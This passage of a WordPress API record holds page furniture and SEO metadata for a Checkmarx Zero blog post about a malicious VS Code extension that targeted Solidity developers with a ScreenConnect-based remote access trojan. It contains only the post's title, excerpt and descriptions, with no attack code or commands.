d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> Share on LinkedIn<\/a><\/span> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/bsky.app\/intent\/compose?text=I%20just%20read%20%22{title}%22%20from%20Checkmarx%20Zero%20{url}\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Bluesky Icon\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> Share on Bluesky<\/a><\/span> <\/p>\n<p class=\"cxzero-social-links\">Follow <a href=\"\/zero\/\">Checkmarx Zero<\/a>: <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/www.linkedin.com\/showcase\/checkmarx-zero\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"Checkmarx Zero on LinkedIn\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-icon\" href=\"https:\/\/bsky.app\/profile\/checkmarxzero.bsky.social\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Checkmarx Zero on Bluesky\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/x.com\/CheckmarxZero\"><svg alt=\"Checkmarx Zero on X\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewbox=\"0 0 512 462.799\"><path fill-rule=\"nonzero\" d=\"M403.229 0h78.506L310.219 196.04 512 462.799H354.002L230.261 301.007 88.669 462.799h-78.56l183.455-209.683L0 0h161.999l111.856 147.88L403.229 0zm-27.556 415.805h43.505L138.363 44.527h-46.68l283.99 371.278z\"><\/path><\/svg> <\/a><\/span> <\/p> <script>function social_action_template(a){const b=encodeURIComponent(window.location.href);const c=document.querySelector(\"h1\");let headContent=(c==null?\"\":c.textContent);let processed=a.replace(\/\\{title\\}\/g,encodeURIComponent(headContent));processed=processed.replace(\/\\{url\\}\/g,b);return processed}var socialAction=document.getElementsByClassName(\"social-action\");console.log(socialAction);for(e=0;e<socialAction.length;e++){element=socialAction.item(e);console.log(element);element.href=social_action_template(element.href)};<\/script> <\/div>\n\n\n\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>We took down yet another malicious VS Code extension trying to target Solidity \/ Ethereum developers with a Remote Access Trojan (RAT). We break down the campaign, key indicators of compromise, and practical steps teams can take to reduce exposure to malicious marketplace packages.<\/p>\n","protected":false},"author":164,"featured_media":106624,"template":"","zero-category":[1067,1176,1104],"zero-tag":[1180,1450,1458],"class_list":["post-106616","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-security-blogs","zero-category-technical-blog","zero-tag-malware","zero-tag-vscode","zero-tag-vscode-extension"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx<\/title>\n<meta name=\"description\" content=\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx\" \/>\n<meta property=\"og:description\" content=\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T09:59:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\",\"name\":\"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"datePublished\":\"2026-01-29T22:01:00+00:00\",\"dateModified\":\"2026-02-02T09:59:42+00:00\",\"description\":\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"width\":2560,\"height\":1280,\"caption\":\"a developer at a workstation is tugged by puppet strings from a large ghostly hand above, while a VS Code extensions screen shows \u201cSolidity\u201d and a \u201cScreenConnect\u201d tag, suggesting a compromised dev setup.\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","og_locale":"en_US","og_type":"article","og_title":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","og_description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.","og_url":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-02-02T09:59:42+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","url":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","name":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","datePublished":"2026-01-29T22:01:00+00:00","dateModified":"2026-02-02T09:59:42+00:00","description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","width":2560,"height":1280,"caption":"a developer at a workstation is tugged by puppet strings from a large ghostly hand above, while a VS Code extensions screen shows \u201cSolidity\u201d and a \u201cScreenConnect\u201d tag, suggesting a compromised dev setup."},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/106616","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/106624"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=106616"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=106616"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=106616"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}